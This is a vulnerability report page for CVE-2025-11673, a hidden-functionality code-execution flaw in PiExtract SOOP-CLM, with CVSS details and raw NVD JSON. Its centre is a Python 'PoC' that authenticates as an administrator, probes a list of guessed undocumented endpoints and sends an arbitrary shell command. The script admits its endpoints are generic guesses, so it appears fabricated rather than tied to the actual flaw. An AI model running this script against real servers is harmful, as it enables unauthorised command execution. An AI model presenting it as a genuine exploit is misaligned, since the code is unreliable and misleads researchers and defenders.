Security Vulnerability Report
中文
CVE-2025-11673 CVSS 7.2 HIGH

CVE-2025-11673

Published: 2025-10-13 08:15:41
Last Modified: 2026-04-15 00:35:42

Description

SOOP-CLM developed by PiExtract has a Hidden Functionality vulnerability, allowing privileged remote attackers to exploit a hidden functionality to execute arbitrary code on the server.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PiExtract SOOP-CLM(所有存在隐藏功能的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11673 - PiExtract SOOP-CLM Hidden Functionality RCE PoC # This PoC demonstrates exploitation of hidden functionality in SOOP-CLM # Note: Requires valid high-privilege credentials import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-soop-clm.example.com" USERNAME = sys.argv[2] if len(sys.argv) > 2 else "admin" PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "password" CMD = sys.argv[4] if len(sys.argv) > 4 else "id" # Hidden/undocumented endpoints commonly found in SOOP-CLM-like products HIDDEN_ENDPOINTS = [ "/api/internal/debug/exec", "/api/v1/admin/hidden/command", "/_internal/system/exec", "/api/debug/runCommand", "/admin/hidden/console", "/api/internal/maintenance/exec" ] session = requests.Session() # Step 1: Authenticate with high-privilege credentials login_url = f"{TARGET_URL}/api/auth/login" login_data = { "username": USERNAME, "password": PASSWORD } print(f"[*] Authenticating to {TARGET_URL}...") resp = session.post(login_url, json=login_data, verify=False) if resp.status_code != 200: print("[-] Authentication failed") sys.exit(1) token = resp.json().get("token") session.headers.update({"Authorization": f"Bearer {token}"}) print("[+] Authentication successful") # Step 2: Enumerate hidden endpoints print("[*] Probing hidden functionality endpoints...") for endpoint in HIDDEN_ENDPOINTS: url = f"{TARGET_URL}{endpoint}" # Step 3: Attempt command execution via hidden functionality payload = { "command": CMD, "cmd": CMD, "exec": CMD } resp = session.post(url, json=payload, verify=False, timeout=10) if resp.status_code == 200 and resp.text: print(f"[+] Hidden endpoint found: {endpoint}") print(f"[+] Command output: {resp.text}") break else: print("[-] No accessible hidden endpoints found")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11673", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:40.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOOP-CLM developed by PiExtract has a Hidden Functionality vulnerability, allowing privileged remote attackers to exploit a hidden functionality to execute arbitrary code on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-912"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10422-e06c3-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10421-5cf6b-1.html", "source": "[email protected]"}]}}